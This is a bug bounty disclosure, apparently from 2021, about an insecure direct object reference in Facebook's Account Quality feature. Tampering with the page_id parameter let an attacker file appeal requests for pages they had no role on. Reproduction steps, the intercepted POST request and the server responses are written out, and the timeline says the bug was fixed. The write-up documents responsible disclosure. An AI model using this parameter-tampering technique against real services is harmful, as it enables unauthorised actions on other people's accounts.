Sarmad Hassan

Published On: 30 Jul 2021

Request Review on behalf of other pages (no role in the page) in Account Quality

IDOR
Facebook | Web
---
LOW VALID

If an item in your catalog doesn’t comply with Facebook Advertising Policies, you can’t use it in Facebook ads. If an item doesn't comply with Facebook Commerce Policies, you can’t sell it on Facebook or Instagram, therefore Facebook have an option called (Request Review) where you can request a second review, this is can be done using Commerce manager or account quality, the bug occur in "Account Quality"

Description

Attacker can request a second review, this is can be done using Commerce manager or account quality, the bug occur in "Account Quality" where attacker can request review on behalf of any page using an IDOR bug that occur in the parameter called "page_id="

Impact

This is will allow the attacker to submit request review on behalf of any page ( without having roles on attacked pages)




Reproduction Steps

Step
1

From the attacker account:
======================
1- Go to https://www.facebook.com/accountquality ==>Facebook Account===>select any page you have===>it will redirect you to below link:
 
2- From the right side of your screen and under the phrase "Not an E-Commerce Business" , click on Request Review button.
 
3- Check the two options===>Intercept with burpsuite ===>hit Submit
you should see POST request as below:
POST /ads/async/advertiser_dashboard/appeal_information/?reason_for_appeal=1&page_id=Attacker_page_id&additional_info=&session_id=xxxx&__user=10001xxx&__a=1&__dyn=xxxxx
 
The vulnerable parameter is "page_id" change the value to victim page id (victim page should have running ads on the page)
you will see the response like below:
for (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":[],"ACEAdvertiserDashboardAppealStatus":"saving_failure"},"hsrp":{"hblp":{"sr_revision":1003529876,"consistency":{"rev":1003529876}}},"lid":"6945126556416951772"}
 
 
To make sure the bug is really exist send the request again with same victim page id, you will see like below response:
for (;;);{"__ar":1,"payload":{"ACEAdvertiserDashboardAppealRejectReason":["PAGE_APPEAL_IN_PROGRESS"],"ACEAdvertiserDashboardAppealStatus":"saving_failure"},"hsrp":{"hblp":{"sr_revision":1003529876,"consistency":{"rev":1003529876}}},"lid":"6945126633837606752"}
 
As you can see above in the response the server tell us that ""PAGE_APPEAL_IN_PROGRESS"]", which mean the attacker submitted request review on the victim page without having role on it.
Timeline
.
Sarmad 29 Mar 2021

Initial Report

.
Facebook 26 Apr 2021

Report Triaged

.
Facebook 26 May 2021

Bounty awarded

.
Facebook 28 Jun 2021

Bug Fixed

.
Sarmad 30 Jun 2021

Fix Confirmed

VALID